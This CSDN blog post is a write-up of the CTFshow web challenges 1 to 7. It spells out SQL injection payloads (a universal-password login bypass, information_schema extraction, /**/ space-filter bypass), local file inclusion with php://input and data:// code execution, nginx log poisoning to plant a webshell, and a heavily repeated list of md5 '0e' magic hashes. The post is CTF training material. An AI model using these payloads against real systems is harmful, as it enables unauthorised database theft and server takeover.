CTFshow—web(1~7)

最新推荐文章于 2024-09-27 17:56:23 发布
最新推荐文章于 2024-09-27 17:56:23 发布
阅读量423 收藏 3
点赞数 2
分类专栏: Web安全-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/111136170
版权

文章目录

Web1签到题

直接查看源码,base64解密

在这里插入图片描述

Web2

最简单的注入
在这里插入图片描述

尝试万能密码:

admin' or 1= 1#

密码随便输:
在这里插入图片描述
可判断闭合符号就是单引号;

判断回显位

payload:username=admin' or 1=1 union select 1,2,3 #&password=123
在这里插入图片描述

判断列数

payload:username=1' or 1=1 order by 3#&password=111
3的时候还会出现欢迎界面,4的时候就不行了,由此判断出字段数(列数)为3.
在这里插入图片描述

爆库

payload:username=1' or 1=1 union select 1,database(),3#&password=111
在这里插入图片描述
爆表名
payload:username=1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2' #&password=111

表名:flag,user
在这里插入图片描述
爆出flag列名

payload:username=1' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#&password=111
在这里插入图片描述
爆值
payload:username=1' or 1=1 union select 1,flag,3 from flag #&password=111
在这里插入图片描述

web3

在这里插入图片描述
根据提示输入?url=/etc/passwd 成功显示,文件包含漏洞
在这里插入图片描述
使用php://input协议
在这里插入图片描述
发现ctf_go_go_go,访问得到flag
在这里插入图片描述
另一种方法:
使用data://协议
通过通配符查找目录下的所有文件

?url=data://text/plain,<?php print_r(glob("*"));?>

得到ctf_go_go_go

web4

和web3类似,经过尝试发现过滤了php,但/etc/passwd可以显示,依旧是文件包含漏洞。

在这里插入图片描述
日志包含:
在查看日志文件时发现服务器是nginx,
在这里插入图片描述
在日志包含中,找到nginx的log有两种
1、?url=/var/log/nginx/access.log
2、?url=/var/log/nginx/error.log
access.log可以打开
在这里插入图片描述
进行日志注入:
在UA中写入一句话木马,使用蚁剑连接
在这里插入图片描述
得到flag

在这里插入图片描述

web5

在这里插入图片描述

ctype_alpha — 做纯字符检测
is_numeric — 检测变量是否为数字或数字字符串
考察md5绕过,要求v1为为纯字母,v2为纯数字,并且v1与v2的md5值相同。

md5漏洞介绍:
PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0
所以只要v1与v2的md5值以0E开头即可。

v1=QNKCDZO&v2=240610708
这里附上常见的0E开头的MD5
0e开头的md5和原值:
QNKCDZO
0e830400451993494058024219903391
240610708
0e462097431906509019562988736854
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

web6

在这里插入图片描述
首先尝试万能密码

admin’ or 1=1#

报错了,经过测试,可以确定过滤了空格,我们可以用%0a或者/**/代替
在这里插入图片描述
判断列数
在这里插入图片描述
当order by 4时就显示错误,证明列数为3

下面判断回显点:
在这里插入图片描述
联合查询注入就行了

username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123456

在这里插入图片描述

username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_schema='web2'/**/and/**/table_name='flag'#&password=123456

在这里插入图片描述

username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(flag),3/**/from/**/flag#&password=123456

在这里插入图片描述

web7

和web6一样,过滤了空格,同上即可

Stray.io
关注
专栏目录
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2564
ctfshow的命令执行(web72-77)
ctfshow之web52~web54
qq_1182418846的博客
08-30 631
09${IFS}$IFS${cat,fl*}%20tac more less head tail nl od(二进制查看) vi vim sort uniq rev cp mvcp命令尝试:?php${IFS}a.txt||//(//后面的内容可以不写的,因为类似会被注释掉)答案也是不在这里,:这里通配符用不了,但可以用双单引号绕过flag:这里也可以不写目录结构,默认copy到/var/www/html/下)或者:?.php。
ctfshow-WEB-web7
热门推荐
wangyuxiang946的博客
08-22 1万+
ctf.show WEB模块第7关是一个SQL注入漏洞,注入点是数值型注入,源码中过滤了空格,我们可以使用括号()或者注释/**/来代替空格 页面中有一个文章列表,随便点一个 从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞 首先判断注入点,输入以下payload,使SQL恒成立 1/**/and/**/1 可以看到,页面正常显示 在输入以下payload,使SQL恒不成立 1/**/and/**/0 可以...
CTFshow信息搜集web1~web20详解
最新发布
m0_74312676的博客
09-27 711
下载文件打开,发现了一个网站地址和登录账号,尝试访问这个地址,结果访问不了,仔细查看地址中的,your-domain,发现是“你的网站地址”的意思。访问www.zip,下载压缩包,得到两个文件,查看fla000g.txt文件的内容,发现是flag,拿去提交,发现是错的,这个是假的flag。点击忘记密码之后发现有一个密保问题,问的是归属地是哪里,于是我们想到了题目提示的邮箱,通过邮箱查询qq号归属地,发现是西安。于是输入西安,就重置了密码,用重置的密码登录即可,用户名依旧是admin,拿到flag。
CTFshow web1
羽的博客
02-26 6179
题目地址:https://ctf.show 扫描后台拿到源码(www.zip)。打开login.php能禁的基本都禁干净了,登录页面貌似没有注入的可能。reg.php也是如此,所以注册页面也没可能了。剩下最后一个就是显示信息的页面了。这里可以看到在数据库中是把所有的字段(包括密码)都给查出来了,但是没有显示密码的地方。 我们可以利用?order=pwd来判断注册的密码与flag用户密码的大小(...
ctfshow- web1(50 point)
HAI_WD的博客
08-29 660
这里有一个坑哇,这里注册的时候密码会给你md5,数据库里存储的也是md5,所以需要我们手动修改为字符。通过url发现这里是通过order by进行了排序,测试发现一共5个字段,并且3是按照密码进行排序。那么思路就是,一个字符一个字符的去进行测试。尝试弱口令无果,可以注册,尝试注册一个账号。首先映入眼帘的是登录界面。
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
Ctfshow web 入门1~20题(萌新向)
weixin_52805837的博客
12-29 4007
Ctfshow web 入门1~12题 web1: 打开网址显示如下: F12直接查看源码即可得到flag web2: ctrl+u打开源码即可得到flag web3: 根据提示“没思路抓个包看看,可能有意外收获” 抓包之后,如上得到了flag web4: ...
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167(1)
2401_84297265的博客
04-28 890
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow web入门——web1
m0_74093152的博客
01-28 87
ctfshowweb入门——web1
CTFshow web入门 web1
weixin_45990644的博客
07-06 269
CTFshow web入门 web1 这道题目比较简单,题目中有提到 “开发注释未及时删除” 点击连接后页面如下:按F12加入开发者模式查找注释(题目有提到),即可得到flag: 补充: 1.做题多看题目。 2.按F12是进加入开发者界面,主要功能简单来说可以帮助开发者调试js和根据页面元素快速定位,确认请求相应时间和相应内容等,根据内容进行程序调优用。 参考来源: https://www.bilibili.com/video/BV14y4y1J7Yb https://zhidao.baidu.com/qu
ctfshow之web入门1
夜未至
03-21 531
在开发场景中,开发人员会忘记将开发时的注释删掉,导致一些意外的问题( 如:getshell),但是在真实场景中基本上是不可能发生的。不过作为初学者应该去了解这些问题。
刷题之旅第21站,CTFshow web1
cc菜的一批
02-16 447
感谢ctf show平台提供题目 F12查看源码,base64解码得到flag
CTFshow 信息收集 web1
Kradress的博客
10-22 143
打开页面,发现下面这段提示 按照惯例,先看一下网页源码,找到flag
CTFShow:萌新web1
weixin_64089259的博客
04-14 1109
第一次做web1题目,刚开始一脸懵逼,看了大佬的一些博客,才做出来,心里非常激动!
ctfshow—web】——信息搜集篇1(web1~20详解)
练习时长两年半的CTF爱好者
02-22 3036
此题为 【从0开始学web】系列第二十题 此系列题目从最基础开始,题目遵循循序渐进的原则 希望对学习CTF WEB的同学有所帮助。
CTF WebCTFShow web1 Writeup(SQL注入+PHP+代码审计)
HEX9CF的技术博客
05-23 334
1代码很安全,没有漏洞。
ctfshow web7
08-23
- *1* [CTFShow web1-7——CTFWEB模块解题思路](https://blog.csdn.net/wangyuxiang946/article/details/120297082)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值